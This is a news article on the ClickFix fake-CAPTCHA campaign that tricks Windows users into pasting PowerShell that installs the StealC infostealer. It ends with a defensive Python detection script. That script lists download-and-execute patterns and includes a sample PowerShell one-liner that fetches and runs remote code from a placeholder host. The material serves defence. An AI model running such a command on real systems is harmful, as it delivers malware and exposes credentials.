Windows Central
Kevin Okemwa

Windows PCs targeted by hackers in a fake CAPTCHA scam to spread malware — Outlook account credentials are at risk


Bad actors and hackers have identified a loophole that allows them to use fake CAPTCHA pages to trick Windows users into launching the "Stealthy StealC Information Stealer" malware.

According to security sleuths at LevelBlue, “StealC exfiltrates browser credentials, cryptocurrency wallets, Steam accounts, Outlook credentials, system information, and screenshots to a command-and-control (C2) server using RC4-encrypted HTTP traffic.”

The social engineering campaign leverages fake CAPTCHA verification pages on compromised websites, which feature realistic Cloudflare-style security checks. As a result, unsuspecting Windows users end up manually executing malicious PowerShell commands disguised as routine verification (via TechRepublic).

I’ve never fully understood the true essence of a CAPTCHA. Yet, as we move deeper into the AI era, proving that an online user is human rather than a bot has become increasingly important. CAPTCHAs are designed to safeguard users by preventing spam and blocking password‑cracking attempts.

How bad actors use the StealC campaign

(Image credit: Getty Images | Witthaya Prasongsin)

As a general rule of thumb, it's always encouraged to be mindful of the websites you're visiting to reduce security risks and threats from bad actors. However, attackers are increasingly cunning and are using more sophisticated techniques.

For instance, the StealC social engineering campaign involves unsuspecting Windows users visiting a usually legitimate website that's already been compromised by hackers, who embed malicious JavaScript code to load a fake CAPTCHA page, which resembles Cloudflare’s verification UI.

However, instead of presenting users with visual tests, the fake CAPTCHA page requests the user to press Windows Key + R, then Ctrl + V, and finally hit the Enter key as part of the verification process.

The approach, known as "ClickFix", works by exploiting Windows users' trust in simple keyboard prompts, which they rarely question, especially when the instruction appears to come from a trusted source and feels like a routine security check.

While the fake CAPTCHA page is instructing the user to press those keys, its script has already placed a malicious PowerShell command on the clipboard. When victims paste it into the Run dialog and hit Enter, the command executes without triggering browser download prompts or security warnings.

The PowerShell command then connects to a remote server to fetch the next stage of its code. This downloader stage is the point at which conventional measures for blocking malicious attacks may not necessarily work.

Strengthening defenses by restricting script use, enforcing application control in Windows, and monitoring outbound traffic to reduce credential exposure can be a few great places to start — if you're tech savvy.
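The "monitoring" suggestion above can be made concrete with a small detection check for the Run-dialog pattern described earlier: a script host such as PowerShell spawned by explorer.exe with a command line that hides its window or reaches out to the web. This is an added example for illustration, not code from LevelBlue, TechRepublic or Windows Central; the event dictionaries are constructed samples loosely modelled on Sysmon process-creation fields, and the field names and the example.invalid URL are assumptions.

```python
"""Flag process-creation events that match the ClickFix pattern: a script host
launched from the Run dialog (parent explorer.exe) whose command line hides its
window, carries an encoded command, or fetches code over HTTP."""
import re

# Substrings that commonly appear in clipboard-delivered PowerShell one-liners.
SUSPICIOUS_PATTERNS = [
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-Expression|iex|DownloadString)\b", re.I),
    re.compile(r"https?://", re.I),
]
RUN_DIALOG_PARENTS = {"explorer.exe"}          # Win+R launches children of explorer.exe
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}


def basename(path):
    """Lower-cased file name of a Windows path (either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Return (record id, matched reasons) for a suspicious event, else None."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    if image not in SCRIPT_HOSTS or parent not in RUN_DIALOG_PARENTS:
        return None
    reasons = [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(event.get("CommandLine", ""))]
    return (event["EventRecordID"], reasons) if reasons else None


def hunt(events):
    """Run analyze_event over a list of events and keep the findings."""
    return [f for f in (analyze_event(e) for e in events) if f]


# Constructed sample events (not real telemetry). Assumed field names.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventRecordID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://example.invalid/verify)"'},
    {"EventRecordID": 2, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-ChildItem C:\\Users"},            # benign Run-dialog use
    {"EventRecordID": 3, "Image": PS, "ParentImage": r"C:\Program Files\Backup\agent.exe",
     "CommandLine": "powershell -w hidden -File C:\\scripts\\nightly.ps1"},  # scheduled task, not Win+R
]

if __name__ == "__main__":
    for record_id, reasons in hunt(SAMPLE_EVENTS):
        print(f"event {record_id}: {len(reasons)} indicator(s) matched")
```

Only event 1 is reported; the hidden-window scheduled task in event 3 is ignored because its parent is not explorer.exe, which keeps the rule focused on the Run-dialog delivery path rather than on PowerShell in general.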

Should browsers do more to protect users from fake CAPTCHA scams? Let me know in the comments.
